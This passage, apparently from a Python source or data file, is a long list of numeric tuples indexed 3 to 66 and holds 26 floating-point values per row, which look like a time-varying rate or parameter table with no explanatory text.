(9.6268124690345, 9.70027006950679, 8.317347825759807, 8.927491689038488, 7.096172454402028, 3.5068512477461056, 3.9696029133183646, 3.7115341049963386, 3.8880720858245827, 1.8947130793704727, 1.3424929098206355, 0.7816914246573948, 0.0, 9.738036490006762, 8.598605671231342, 6.712464549103178, 5.684139238111417, 7.7761441716491655, 5.196147746994874, 3.9696029133183646, 2.5048937483900753, 3.548086227201014, 2.97583056301283, 1.6634695651519613, 0.8818427335915264, 0.0), # 3
(10.149017837465571, 10.222556958952469, 8.765190532937382, 9.408346369659084, 7.479620910716259, 3.6957491269054237, 4.183154934806767, 3.910887907463277, 4.097441090977444, 1.996622358867072, 1.4148197692241535, 0.8237731189806353, 0.0, 10.262701812703709, 9.061504308786986, 7.074098846120767, 5.9898670766012145, 8.194882181954888, 5.475243070448588, 4.183154934806767, 2.6398208049324454, 3.7398104553581293, 3.136115456553029, 1.7530381065874767, 0.9293233599047701, 0.0), # 4
(10.663300349893618, 10.736378069917262, 9.205771911670025, 9.881403222864472, 7.8570345778125645, 3.8815821035518008, 4.393246331780179, 4.1070051790163955, 4.303412862923498, 2.096880722367466, 1.4859740070792353, 0.8651724542978865, 0.0, 10.778856575412524, 9.51689699727675, 7.429870035396177, 6.290642167102396, 8.606825725846996, 5.749807250622953, 4.393246331780179, 2.772558645394143, 3.9285172889062823, 3.2938010742881585, 1.841154382334005, 0.9760343699924785, 0.0), # 5
(11.167587436551466, 11.239619220007935, 9.637279371365155, 10.344716184059584, 8.226875492561113, 4.06358587021414, 4.59901256518501, 4.299079526001659, 4.5051402854596345, 2.195075543741104, 1.555662879247542, 0.9057191149969079, 0.0, 11.284377660319372, 9.962910264965986, 7.77831439623771, 6.5852266312233105, 9.010280570919269, 6.018711336402323, 4.59901256518501, 2.902561335867243, 4.113437746280557, 3.448238728019862, 1.9274558742730312, 1.021783565455267, 0.0), # 6
(11.65980652767195, 11.73016622683126, 10.05790032143018, 10.796339188649355, 8.587605691832056, 4.2409961194213395, 4.799589095967668, 4.486304554765035, 4.701776242382744, 2.2907941968574352, 1.6235936415907386, 0.9452427854654573, 0.0, 11.777141949610431, 10.397670640120028, 8.117968207953693, 6.872382590572304, 9.403552484765488, 6.280826376671049, 4.799589095967668, 3.029282942443814, 4.293802845916028, 3.598779729549786, 2.0115800642860364, 1.066378747893751, 0.0), # 7
(12.137885053487896, 12.205904907994013, 10.465822171272528, 11.234326172038713, 8.937687212495558, 4.413048543702297, 4.994111385074558, 4.667873871652484, 4.89247361748971, 2.3836240555859103, 1.6894735499704858, 0.9835731500912939, 0.0, 12.255026325471867, 10.81930465100423, 8.447367749852429, 7.150872166757729, 9.78494723497942, 6.535023420313477, 4.994111385074558, 3.152177531215927, 4.468843606247779, 3.744775390679572, 2.093164434254506, 1.1096277189085468, 0.0), # 8
(12.599750444232136, 12.664721081102966, 10.859232330299607, 11.656731069632603, 9.27558209142177, 4.578978835585919, 5.181714893452096, 4.842981083009976, 5.076385294577426, 2.4731524937959772, 1.7530098602484476, 1.0205398932621754, 0.0, 12.71590767008986, 11.225938825883926, 8.765049301242238, 7.41945748138793, 10.152770589154851, 6.780173516213966, 5.181714893452096, 3.270699168275656, 4.637791045710885, 3.8855770232108684, 2.1718464660599213, 1.1513382801002698, 0.0), # 9
(13.043330130137491, 13.104500563764889, 11.236318207918833, 12.061607816835945, 9.599752365480853, 4.7380226876011005, 5.361535082046684, 5.010819795183474, 5.252664157442781, 2.558966885357086, 1.8139098282862867, 1.0559726993658605, 0.0, 13.157662865650577, 11.615699693024464, 9.069549141431432, 7.676900656071258, 10.505328314885562, 7.015147713256865, 5.361535082046684, 3.3843019197150714, 4.799876182740427, 4.020535938945316, 2.247263641583767, 1.1913182330695355, 0.0), # 10
(13.466551541436809, 13.52312917358657, 11.595267213537621, 12.447010349053677, 9.908660071542968, 4.889415792276744, 5.532707411804733, 5.170583614518944, 5.420463089882663, 2.640654604138688, 1.8718807099456667, 1.0897012527901082, 0.0, 13.57816879434018, 11.986713780691188, 9.359403549728333, 7.921963812416063, 10.840926179765326, 7.238817060326522, 5.532707411804733, 3.4924398516262456, 4.954330035771484, 4.14900344968456, 2.3190534427075247, 1.229375379416961, 0.0), # 11
(13.8673421083629, 13.918492728174757, 11.934266756563387, 12.810992601690735, 10.200767246478268, 5.032393842141746, 5.694367343672649, 5.321466147362347, 5.578934975693962, 2.7178030240102293, 1.9266297610882495, 1.1215552379226759, 0.0, 13.975302338344855, 12.337107617149433, 9.633148805441246, 8.153409072030687, 11.157869951387925, 7.4500526063072865, 5.694367343672649, 3.5945670301012465, 5.100383623239134, 4.270330867230246, 2.3868533513126775, 1.26531752074316, 0.0), # 12
(14.243629261148602, 14.288477045136244, 12.251504246403549, 13.151608510152053, 10.474535927156907, 5.166192529725009, 5.845650338596845, 5.462661000059654, 5.727232698673564, 2.7899995188411624, 1.9778642375756985, 1.1513643391513229, 0.0, 14.346940379850777, 12.66500773066455, 9.889321187878492, 8.369998556523486, 11.454465397347128, 7.647725400083517, 5.845650338596845, 3.6901375212321494, 5.237267963578454, 4.383869503384019, 2.45030084928071, 1.2989524586487495, 0.0), # 13
(14.593340430026746, 14.630967942077797, 12.54516709246553, 13.466912009842552, 10.728428150449055, 5.2900475475554325, 5.9856918575237295, 5.593361778956831, 5.864509142618358, 2.856831462500934, 2.0252913952696763, 1.1789582408638082, 0.0, 14.690959801044102, 12.968540649501888, 10.12645697634838, 8.570494387502801, 11.729018285236716, 7.830706490539565, 5.9856918575237295, 3.778605391111023, 5.3642140752245275, 4.488970669947518, 2.509033418493106, 1.3300879947343454, 0.0), # 14
(14.914403045230168, 14.943851236606186, 12.813442704156724, 13.754957036167184, 10.960905953224861, 5.403194588161918, 6.1136273613997005, 5.7127620903998375, 5.989917191325237, 2.917886228858997, 2.0686184900318456, 1.2041666274478897, 0.0, 15.00523748411101, 13.245832901926784, 10.343092450159226, 8.753658686576989, 11.979834382650473, 7.997866926559773, 6.1136273613997005, 3.8594247058299413, 5.480452976612431, 4.584985678722395, 2.562688540831345, 1.3585319306005625, 0.0), # 15
(15.204744536991681, 15.225012746328195, 13.054518490884568, 14.013797524530858, 11.170431372354487, 5.504869344073363, 6.228592311171181, 5.820055540734641, 6.102609728591085, 2.972751191784799, 2.1075527777238703, 1.2268191832913256, 0.0, 15.287650311237673, 13.495011016204579, 10.53776388861935, 8.918253575354395, 12.20521945718217, 8.148077757028497, 6.228592311171181, 3.932049531480973, 5.585215686177244, 4.671265841510287, 2.6109036981769136, 1.384092067848018, 0.0), # 16
(15.46229233554412, 15.472338288850588, 13.266581862056471, 14.241487410338536, 11.355466444708094, 5.594307507818667, 6.329722167784569, 5.914435736307213, 6.201739638212791, 3.021013725147788, 2.141801514207413, 1.2467455927818742, 0.0, 15.536075164610265, 13.714201520600614, 10.709007571037066, 9.063041175443361, 12.403479276425582, 8.280210030830098, 6.329722167784569, 3.9959339341561906, 5.677733222354047, 4.747162470112846, 2.6533163724112945, 1.4065762080773265, 0.0), # 17
(15.684973871120327, 15.683713681780135, 13.447820227079841, 14.436080628995136, 11.514473207155827, 5.670744771926737, 6.416152392186281, 5.995096283463507, 6.286459803987251, 3.0622612028174157, 2.171071955344136, 1.2637755403072954, 0.0, 15.748388926414954, 13.901530943380248, 10.855359776720679, 9.186783608452245, 12.572919607974502, 8.39313479684891, 6.416152392186281, 4.050531979947669, 5.757236603577914, 4.812026876331712, 2.689564045415968, 1.4257921528891033, 0.0), # 18
(15.870716573953118, 15.857024742723624, 13.596420995362104, 14.59563111590558, 11.645913696567856, 5.733416828926462, 6.4870184453227155, 6.061230788549498, 6.355923109711349, 3.0960809986631324, 2.1950713569957014, 1.2777387102553464, 0.0, 15.922468478837914, 14.055125812808807, 10.975356784978505, 9.288242995989394, 12.711846219422698, 8.485723103969297, 6.4870184453227155, 4.095297734947473, 5.822956848283928, 4.865210371968527, 2.7192841990724212, 1.441547703883966, 0.0), # 19
(16.01744787427533, 15.990157289287811, 13.710571576310672, 14.718192806474825, 11.748249949814339, 5.781559371346751, 6.54145578814029, 6.112032857911145, 6.409282439181973, 3.1220604865543846, 2.213506975023774, 1.2884647870137858, 0.0, 16.05619070406532, 14.17311265715164, 11.067534875118868, 9.366181459663151, 12.818564878363945, 8.556846001075604, 6.54145578814029, 4.129685265247679, 5.874124974907169, 4.9060642688249425, 2.7421143152621346, 1.4536506626625285, 0.0), # 20
(16.123095202319785, 16.080997139079486, 13.78845937933296, 14.801819636107783, 11.819944003765428, 5.8144080917165, 6.578599881585408, 6.1466960978944165, 6.445690676196012, 3.139787040360623, 2.226086065290016, 1.2957834549703726, 0.0, 16.147432484283325, 14.253618004674097, 11.13043032645008, 9.419361121081867, 12.891381352392024, 8.605374537052183, 6.578599881585408, 4.153148636940357, 5.909972001882714, 4.933939878702596, 2.757691875866592, 1.461908830825408, 0.0), # 21
(16.18558598831933, 16.12743010970541, 13.82827181383638, 14.844565540209405, 11.85945789529128, 5.83119868256461, 6.59758618660448, 6.164414114845277, 6.464300704550355, 3.148848033951298, 2.232515883656091, 1.2995243985128655, 0.0, 16.194070701678125, 14.294768383641518, 11.162579418280455, 9.446544101853892, 12.92860140910071, 8.630179760783388, 6.59758618660448, 4.1651419161175784, 5.92972894764564, 4.948188513403136, 2.7656543627672763, 1.4661300099732195, 0.0), # 22
(16.208629381348224, 16.132927937814358, 13.83323090992227, 14.849916975308645, 11.869580859768103, 5.833333333333334, 6.599843201807471, 6.166329218106997, 6.466627325102881, 3.149916909007774, 2.233322143243131, 1.2999863435451913, 0.0, 16.2, 14.299849778997103, 11.166610716215654, 9.44975072702332, 12.933254650205763, 8.632860905349796, 6.599843201807471, 4.166666666666667, 5.9347904298840515, 4.949972325102882, 2.7666461819844543, 1.4666298125285782, 0.0), # 23
(16.225619860854646, 16.12972098765432, 13.832419753086421, 14.849258333333335, 11.875314787855842, 5.833333333333334, 6.598603050108934, 6.163666666666667, 6.466315555555555, 3.149260246913581, 2.2332332210998884, 1.2998781893004117, 0.0, 16.2, 14.298660082304526, 11.166166105499443, 9.44778074074074, 12.93263111111111, 8.629133333333334, 6.598603050108934, 4.166666666666667, 5.937657393927921, 4.949752777777779, 2.7664839506172845, 1.4663382716049385, 0.0), # 24
(16.242251568338528, 16.1233996342021, 13.830818472793784, 14.847955246913582, 11.880922608634137, 5.833333333333334, 6.596159122085048, 6.158436213991771, 6.465699588477367, 3.1479675354366723, 2.233056906513697, 1.2996646852613931, 0.0, 16.2, 14.296311537875322, 11.165284532568485, 9.443902606310015, 12.931399176954734, 8.62181069958848, 6.596159122085048, 4.166666666666667, 5.940461304317068, 4.949318415637862, 2.766163694558757, 1.4657636031092822, 0.0), # 25
(16.258523230476854, 16.114060448102425, 13.828449016918157, 14.846022530864197, 11.886404126315846, 5.833333333333334, 6.592549374646977, 6.150736625514405, 6.46478732510288, 3.146060283493371, 2.2327947956935614, 1.2993487578113097, 0.0, 16.2, 14.292836335924404, 11.163973978467807, 9.43818085048011, 12.92957465020576, 8.611031275720167, 6.592549374646977, 4.166666666666667, 5.943202063157923, 4.948674176954733, 2.7656898033836312, 1.46491458619113, 0.0), # 26
(16.27443357394662, 16.1018, 13.825333333333333, 14.843475, 11.891759145113827, 5.833333333333334, 6.587811764705883, 6.140666666666667, 6.463586666666666, 3.143560000000001, 2.232448484848485, 1.2989333333333337, 0.0, 16.2, 14.288266666666669, 11.162242424242425, 9.430679999999999, 12.927173333333332, 8.596933333333334, 6.587811764705883, 4.166666666666667, 5.945879572556914, 4.947825000000001, 2.765066666666667, 1.4638000000000002, 0.0), # 27
(16.2899813254248, 16.08671486053955, 13.821493369913123, 14.840327469135804, 11.896987469240962, 5.833333333333334, 6.581984249172921, 6.12832510288066, 6.462105514403292, 3.140488193872886, 2.232019570187472, 1.2984213382106389, 0.0, 16.2, 14.282634720317025, 11.160097850937358, 9.421464581618656, 12.924211028806583, 8.579655144032923, 6.581984249172921, 4.166666666666667, 5.948493734620481, 4.946775823045269, 2.764298673982625, 1.462428623685414, 0.0), # 28
(16.3051652115884, 16.0689016003658, 13.816951074531323, 14.83659475308642, 11.902088902910101, 5.833333333333334, 6.575104784959253, 6.113810699588477, 6.460351769547325, 3.1368663740283504, 2.2315096479195247, 1.2978156988263985, 0.0, 16.2, 14.27597268709038, 11.157548239597624, 9.41059912208505, 12.92070353909465, 8.559334979423868, 6.575104784959253, 4.166666666666667, 5.951044451455051, 4.945531584362141, 2.763390214906265, 1.460809236396891, 0.0), # 29
(16.319983959114396, 16.04845679012346, 13.811728395061728, 14.832291666666666, 11.907063250334119, 5.833333333333334, 6.567211328976035, 6.097222222222222, 6.458333333333333, 3.1327160493827173, 2.230920314253648, 1.297119341563786, 0.0, 16.2, 14.268312757201645, 11.15460157126824, 9.398148148148149, 12.916666666666666, 8.536111111111111, 6.567211328976035, 4.166666666666667, 5.953531625167059, 4.944097222222223, 2.7623456790123457, 1.458950617283951, 0.0), # 30
(16.334436294679772, 16.02547700045725, 13.805847279378145, 14.82743302469136, 11.911910315725876, 5.833333333333334, 6.558341838134432, 6.078658436213992, 6.456058106995885, 3.1280587288523103, 2.2302531653988447, 1.296335192805975, 0.0, 16.2, 14.259687120865724, 11.151265826994223, 9.384176186556928, 12.91211621399177, 8.510121810699589, 6.558341838134432, 4.166666666666667, 5.955955157862938, 4.942477674897121, 2.761169455875629, 1.4568615454961138, 0.0), # 31
(16.34852094496153, 16.00005880201189, 13.799329675354366, 14.82203364197531, 11.916629903298237, 5.833333333333334, 6.548534269345599, 6.058218106995886, 6.453533991769548, 3.1229159213534534, 2.229509797564119, 1.2954661789361381, 0.0, 16.2, 14.250127968297518, 11.147548987820594, 9.368747764060357, 12.907067983539095, 8.48150534979424, 6.548534269345599, 4.166666666666667, 5.958314951649118, 4.940677880658438, 2.759865935070873, 1.4545508001828993, 0.0), # 32
(16.362236636636634, 15.972298765432097, 13.792197530864199, 14.816108333333332, 11.921221817264065, 5.833333333333334, 6.537826579520697, 6.0360000000000005, 6.450768888888889, 3.1173091358024703, 2.228691806958474, 1.2945152263374486, 0.0, 16.2, 14.239667489711932, 11.143459034792368, 9.351927407407409, 12.901537777777778, 8.450400000000002, 6.537826579520697, 4.166666666666667, 5.960610908632033, 4.938702777777778, 2.75843950617284, 1.452027160493827, 0.0), # 33
(16.375582096382097, 15.942293461362596, 13.784472793781436, 14.809671913580248, 11.92568586183623, 5.833333333333334, 6.526256725570888, 6.012102880658436, 6.447770699588479, 3.111259881115685, 2.2278007897909133, 1.2934852613930805, 0.0, 16.2, 14.228337875323884, 11.139003948954567, 9.333779643347052, 12.895541399176958, 8.41694403292181, 6.526256725570888, 4.166666666666667, 5.962842930918115, 4.93655730452675, 2.7568945587562874, 1.449299405578418, 0.0), # 34
(16.388556050874893, 15.9101394604481, 13.776177411979882, 14.802739197530864, 11.930021841227594, 5.833333333333334, 6.513862664407327, 5.986625514403293, 6.4445473251028815, 3.1047896662094203, 2.226838342270441, 1.2923792104862066, 0.0, 16.2, 14.216171315348271, 11.134191711352205, 9.314368998628257, 12.889094650205763, 8.381275720164611, 6.513862664407327, 4.166666666666667, 5.965010920613797, 4.934246399176955, 2.755235482395977, 1.4463763145861912, 0.0), # 35
(16.40115722679201, 15.87593333333333, 13.767333333333335, 14.795325, 11.934229559651024, 5.833333333333334, 6.500682352941176, 5.959666666666668, 6.441106666666666, 3.097920000000001, 2.225806060606061, 1.2912000000000003, 0.0, 16.2, 14.203200000000002, 11.129030303030303, 9.29376, 12.882213333333333, 8.343533333333335, 6.500682352941176, 4.166666666666667, 5.967114779825512, 4.931775000000001, 2.753466666666667, 1.4432666666666667, 0.0), # 36
(16.41338435081044, 15.839771650663007, 13.757962505715593, 14.78744413580247, 11.938308821319383, 5.833333333333334, 6.486753748083595, 5.931325102880659, 6.437456625514404, 3.090672391403751, 2.2247055410067764, 1.2899505563176348, 0.0, 16.2, 14.18945611949398, 11.123527705033881, 9.27201717421125, 12.874913251028808, 8.303855144032923, 6.486753748083595, 4.166666666666667, 5.969154410659692, 4.929148045267491, 2.751592501143119, 1.4399792409693644, 0.0), # 37
(16.425236149607162, 15.801750983081849, 13.748086877000459, 14.77911141975309, 11.942259430445535, 5.833333333333334, 6.4721148067457435, 5.901699588477367, 6.433605102880659, 3.0830683493369926, 2.22353837968159, 1.2886338058222835, 0.0, 16.2, 14.174971864045116, 11.11769189840795, 9.249205048010975, 12.867210205761317, 8.262379423868314, 6.4721148067457435, 4.166666666666667, 5.971129715222768, 4.926370473251031, 2.7496173754000917, 1.4365228166438047, 0.0), # 38
(16.436711349859177, 15.761967901234568, 13.737728395061731, 14.770341666666667, 11.94608119124235, 5.833333333333334, 6.456803485838781, 5.8708888888888895, 6.42956, 3.0751293827160504, 2.2223061728395064, 1.2872526748971194, 0.0, 16.2, 14.159779423868311, 11.111530864197531, 9.225388148148149, 12.85912, 8.219244444444445, 6.456803485838781, 4.166666666666667, 5.973040595621175, 4.923447222222223, 2.7475456790123465, 1.4329061728395065, 0.0), # 39
(16.44780867824346, 15.720518975765888, 13.726909007773205, 14.761149691358025, 11.949773907922687, 5.833333333333334, 6.440857742273865, 5.838991769547327, 6.425329218106996, 3.0668770004572488, 2.2210105166895295, 1.2858100899253166, 0.0, 16.2, 14.143910989178481, 11.105052583447646, 9.200631001371743, 12.850658436213992, 8.174588477366258, 6.440857742273865, 4.166666666666667, 5.974886953961343, 4.920383230452676, 2.745381801554641, 1.42913808870599, 0.0), # 40
(16.458526861437004, 15.677500777320528, 13.71565066300869, 14.751550308641978, 11.953337384699417, 5.833333333333334, 6.424315532962156, 5.806106995884774, 6.420920658436214, 3.05833271147691, 2.2196530074406624, 1.2843089772900476, 0.0, 16.2, 14.12739875019052, 11.09826503720331, 9.174998134430727, 12.841841316872427, 8.128549794238685, 6.424315532962156, 4.166666666666667, 5.976668692349708, 4.9171834362139935, 2.743130132601738, 1.4252273433927756, 0.0), # 41
(16.4688646261168, 15.633009876543213, 13.70397530864198, 14.741558333333336, 11.956771425785394, 5.833333333333334, 6.4072148148148145, 5.772333333333334, 6.416342222222223, 3.049518024691359, 2.2182352413019086, 1.282752263374486, 0.0, 16.2, 14.110274897119341, 11.091176206509541, 9.148554074074074, 12.832684444444446, 8.081266666666668, 6.4072148148148145, 4.166666666666667, 5.978385712892697, 4.913852777777779, 2.740795061728396, 1.421182716049383, 0.0), # 42
(16.47882069895983, 15.587142844078647, 13.69190489254687, 14.731188580246915, 11.960075835393496, 5.833333333333334, 6.389593544743001, 5.737769547325104, 6.4116018106995885, 3.040454449016919, 2.2167588144822714, 1.281142874561805, 0.0, 16.2, 14.092571620179852, 11.083794072411356, 9.121363347050755, 12.823203621399177, 8.032877366255146, 6.389593544743001, 4.166666666666667, 5.980037917696748, 4.9103961934156395, 2.738380978509374, 1.4170129858253318, 0.0), # 43
(16.488393806643085, 15.539996250571559, 13.679461362597166, 14.720455864197532, 11.963250417736582, 5.833333333333334, 6.371489679657872, 5.702514403292183, 6.4067073251028805, 3.031163493369914, 2.2152253231907557, 1.279483737235178, 0.0, 16.2, 14.074321109586954, 11.076126615953777, 9.09349048010974, 12.813414650205761, 7.983520164609057, 6.371489679657872, 4.166666666666667, 5.981625208868291, 4.906818621399179, 2.7358922725194335, 1.4127269318701419, 0.0), # 44
(16.497582675843546, 15.491666666666667, 13.66666666666667, 14.709375000000001, 11.966294977027516, 5.833333333333334, 6.352941176470589, 5.666666666666668, 6.4016666666666655, 3.021666666666668, 2.213636363636364, 1.277777777777778, 0.0, 16.2, 14.055555555555554, 11.068181818181818, 9.065000000000001, 12.803333333333331, 7.9333333333333345, 6.352941176470589, 4.166666666666667, 5.983147488513758, 4.903125000000001, 2.733333333333334, 1.4083333333333337, 0.0), # 45
(16.50638603323821, 15.442250663008686, 13.653542752629173, 14.697960802469137, 11.969209317479164, 5.833333333333334, 6.333985992092311, 5.63032510288066, 6.396487736625514, 3.0119854778235036, 2.2119935320281, 1.2760279225727789, 0.0, 16.2, 14.036307148300564, 11.059967660140499, 9.035956433470508, 12.792975473251028, 7.882455144032924, 6.333985992092311, 4.166666666666667, 5.984604658739582, 4.899320267489713, 2.730708550525835, 1.4038409693644263, 0.0), # 46
(16.514802605504055, 15.391844810242342, 13.640111568358483, 14.686228086419753, 11.971993243304391, 5.833333333333334, 6.3146620834341975, 5.593588477366255, 6.391178436213992, 3.0021414357567453, 2.210298424574968, 1.2742370980033535, 0.0, 16.2, 14.016608078036885, 11.051492122874839, 9.006424307270233, 12.782356872427984, 7.831023868312758, 6.3146620834341975, 4.166666666666667, 5.985996621652196, 4.895409362139919, 2.728022313671697, 1.3992586191129404, 0.0), # 47
(16.522831119318074, 15.340545679012347, 13.626395061728397, 14.674191666666669, 11.974646558716064, 5.833333333333334, 6.295007407407407, 5.556555555555557, 6.385746666666667, 2.9921560493827166, 2.208552637485971, 1.272408230452675, 0.0, 16.2, 13.996490534979422, 11.042763187429854, 8.976468148148149, 12.771493333333334, 7.77917777777778, 6.295007407407407, 4.166666666666667, 5.987323279358032, 4.891397222222224, 2.7252790123456796, 1.3945950617283953, 0.0), # 48
(16.53047030135726, 15.288449839963418, 13.612415180612713, 14.661866358024692, 11.977169067927047, 5.833333333333334, 6.275059920923102, 5.519325102880659, 6.380200329218106, 2.982050827617742, 2.2067577669701133, 1.2705442463039174, 0.0, 16.2, 13.97598670934309, 11.033788834850565, 8.946152482853226, 12.760400658436213, 7.727055144032923, 6.275059920923102, 4.166666666666667, 5.9885845339635235, 4.887288786008232, 2.7224830361225427, 1.389859076360311, 0.0), # 49
(16.537718878298588, 15.235653863740286, 13.598193872885233, 14.649266975308642, 11.979560575150202, 5.833333333333334, 6.25485758089244, 5.481995884773663, 6.3745473251028795, 2.971847279378144, 2.204915409236397, 1.2686480719402533, 0.0, 16.2, 13.955128791342785, 11.024577046181985, 8.91554183813443, 12.749094650205759, 7.674794238683129, 6.25485758089244, 4.166666666666667, 5.989780287575101, 4.883088991769548, 2.7196387745770467, 1.385059442158208, 0.0), # 50
(16.544575576819057, 15.182254320987655, 13.583753086419755, 14.636408333333335, 11.981820884598399, 5.833333333333334, 6.23443834422658, 5.4446666666666665, 6.368795555555556, 2.9615669135802474, 2.2030271604938276, 1.2667226337448563, 0.0, 16.2, 13.933948971193416, 11.015135802469137, 8.88470074074074, 12.737591111111112, 7.622533333333334, 6.23443834422658, 4.166666666666667, 5.9909104422991994, 4.878802777777779, 2.716750617283951, 1.380204938271605, 0.0), # 51
(16.551039123595647, 15.128347782350252, 13.56911476909008, 14.623305246913581, 11.983949800484496, 5.833333333333334, 6.213840167836683, 5.407436213991769, 6.3629529218107, 2.9512312391403754, 2.2010946169514076, 1.2647708581008996, 0.0, 16.2, 13.912479439109894, 11.005473084757037, 8.853693717421125, 12.7259058436214, 7.570410699588477, 6.213840167836683, 4.166666666666667, 5.991974900242248, 4.874435082304528, 2.713822953818016, 1.3753043438500232, 0.0), # 52
(16.55710824530535, 15.074030818472796, 13.554300868770008, 14.609972530864198, 11.985947127021364, 5.833333333333334, 6.1931010086339064, 5.370403292181071, 6.357027325102881, 2.940861764974852, 2.1991193748181406, 1.2627956713915565, 0.0, 16.2, 13.890752385307119, 10.995596874090701, 8.822585294924554, 12.714054650205762, 7.518564609053499, 6.1931010086339064, 4.166666666666667, 5.992973563510682, 4.8699908436214, 2.710860173754002, 1.3703664380429816, 0.0), # 53
(16.562781668625146, 15.019400000000001, 13.539333333333333, 14.596425, 11.987812668421869, 5.833333333333334, 6.172258823529412, 5.333666666666667, 6.351026666666667, 2.9304800000000006, 2.19710303030303, 1.2608000000000001, 0.0, 16.2, 13.8688, 10.98551515151515, 8.791440000000001, 12.702053333333334, 7.467133333333333, 6.172258823529412, 4.166666666666667, 5.993906334210934, 4.865475000000001, 2.707866666666667, 1.3654000000000004, 0.0), # 54
(16.568058120232035, 14.964551897576587, 13.524234110653865, 14.582677469135803, 11.989546228898869, 5.833333333333334, 6.151351569434358, 5.2973251028806585, 6.344958847736625, 2.9201074531321454, 2.1950471796150812, 1.2587867703094042, 0.0, 16.2, 13.846654473403445, 10.975235898075404, 8.760322359396435, 12.68991769547325, 7.416255144032922, 6.151351569434358, 4.166666666666667, 5.994773114449434, 4.860892489711935, 2.704846822130773, 1.360413808870599, 0.0), # 55
(16.572936326802996, 14.909583081847279, 13.509025148605396, 14.56874475308642, 11.991147612665237, 5.833333333333334, 6.130417203259905, 5.261477366255145, 6.338831769547324, 2.9097656332876096, 2.1929534189632958, 1.2567589087029418, 0.0, 16.2, 13.824347995732358, 10.964767094816478, 8.729296899862828, 12.677663539094649, 7.366068312757203, 6.130417203259905, 4.166666666666667, 5.995573806332619, 4.856248251028807, 2.7018050297210796, 1.3554166438042983, 0.0), # 56
(16.577415015015013, 14.85459012345679, 13.493728395061732, 14.554641666666669, 11.99261662393383, 5.833333333333334, 6.109493681917211, 5.226222222222224, 6.332653333333334, 2.899476049382717, 2.1908233445566783, 1.254719341563786, 0.0, 16.2, 13.801912757201645, 10.95411672278339, 8.69842814814815, 12.665306666666668, 7.316711111111113, 6.109493681917211, 4.166666666666667, 5.996308311966915, 4.851547222222224, 2.6987456790123465, 1.3504172839506174, 0.0), # 57
(16.581492911545087, 14.79966959304984, 13.478365797896664, 14.540383024691359, 11.99395306691752, 5.833333333333334, 6.088618962317438, 5.191658436213992, 6.326431440329218, 2.8892602103337914, 2.1886585526042324, 1.2526709952751107, 0.0, 16.2, 13.779380948026215, 10.943292763021162, 8.667780631001373, 12.652862880658436, 7.2683218106995895, 6.088618962317438, 4.166666666666667, 5.99697653345876, 4.846794341563787, 2.695673159579333, 1.3454245084590766, 0.0), # 58
(16.585168743070195, 14.744918061271147, 13.462959304983997, 14.525983641975309, 11.995156745829167, 5.833333333333334, 6.067831001371743, 5.157884773662552, 6.320173991769548, 2.879139625057157, 2.1864606393149604, 1.2506167962200887, 0.0, 16.2, 13.756784758420972, 10.9323031965748, 8.63741887517147, 12.640347983539096, 7.221038683127573, 6.067831001371743, 4.166666666666667, 5.9975783729145835, 4.841994547325104, 2.6925918609968, 1.3404470964791952, 0.0), # 59
(16.588441236267325, 14.690432098765434, 13.44753086419753, 14.511458333333334, 11.996227464881638, 5.833333333333334, 6.0471677559912855, 5.125000000000001, 6.31388888888889, 2.8691358024691365, 2.184231200897868, 1.2485596707818931, 0.0, 16.2, 13.734156378600822, 10.921156004489339, 8.607407407407408, 12.62777777777778, 7.175000000000001, 6.0471677559912855, 4.166666666666667, 5.998113732440819, 4.837152777777779, 2.6895061728395064, 1.3354938271604941, 0.0), # 60
(16.591309117813463, 14.636308276177413, 13.432102423411067, 14.496821913580249, 11.997165028287798, 5.833333333333334, 6.026667183087227, 5.093102880658437, 6.3075840329218105, 2.8592702514860546, 2.1819718335619576, 1.246502545343698, 0.0, 16.2, 13.711527998780674, 10.909859167809786, 8.577810754458163, 12.615168065843621, 7.130344032921811, 6.026667183087227, 4.166666666666667, 5.998582514143899, 4.832273971193417, 2.6864204846822135, 1.3305734796524924, 0.0), # 61
(16.593771114385607, 14.582643164151806, 13.416695930498403, 14.482089197530867, 11.997969240260517, 5.833333333333334, 6.006367239570725, 5.062292181069959, 6.301267325102881, 2.849564481024235, 2.1796841335162327, 1.2444483462886757, 0.0, 16.2, 13.68893180917543, 10.898420667581162, 8.548693443072704, 12.602534650205762, 7.0872090534979435, 6.006367239570725, 4.166666666666667, 5.998984620130258, 4.827363065843623, 2.6833391860996807, 1.3256948331047098, 0.0), # 62
(16.595825952660736, 14.529533333333333, 13.401333333333335, 14.467275000000003, 11.998639905012647, 5.833333333333334, 5.986305882352941, 5.0326666666666675, 6.294946666666666, 2.8400400000000006, 2.1773696969696976, 1.2424000000000002, 0.0, 16.2, 13.6664, 10.886848484848487, 8.52012, 12.589893333333332, 7.045733333333335, 5.986305882352941, 4.166666666666667, 5.999319952506323, 4.822425000000002, 2.6802666666666672, 1.3208666666666669, 0.0), # 63
(16.597472359315837, 14.477075354366713, 13.386036579789668, 14.452394135802471, 11.999176826757065, 5.833333333333334, 5.966521068345034, 5.004325102880659, 6.288629958847737, 2.830718317329676, 2.1750301201313547, 1.2403604328608446, 0.0, 16.2, 13.64396476146929, 10.875150600656774, 8.492154951989026, 12.577259917695473, 7.006055144032923, 5.966521068345034, 4.166666666666667, 5.999588413378532, 4.817464711934158, 2.6772073159579337, 1.316097759487883, 0.0), # 64
(16.5987090610279, 14.425365797896662, 13.370827617741199, 14.437461419753088, 11.999579809706631, 5.833333333333334, 5.947050754458163, 4.977366255144033, 6.282325102880659, 2.8216209419295843, 2.1726669992102097, 1.238332571254382, 0.0, 16.2, 13.6216582837982, 10.863334996051048, 8.464862825788751, 12.564650205761318, 6.968312757201646, 5.947050754458163, 4.166666666666667, 5.999789904853316, 4.812487139917697, 2.67416552354824, 1.3113968907178786, 0.0), # 65
(16.599534784473914, 14.374501234567903, 13.35572839506173, 14.422491666666668, 11.99984865807421, 5.833333333333334, 5.927932897603486, 4.95188888888889, 6.27604, 2.81276938271605, 2.170281930415264, 1.2363193415637863, 0.0, 16.2, 13.599512757201648, 10.851409652076319, 8.438308148148149, 12.55208, 6.932644444444446, 5.927932897603486, 4.166666666666667, 5.999924329037105, 4.807497222222223, 2.6711456790123465, 1.3067728395061733, 0.0), # 66
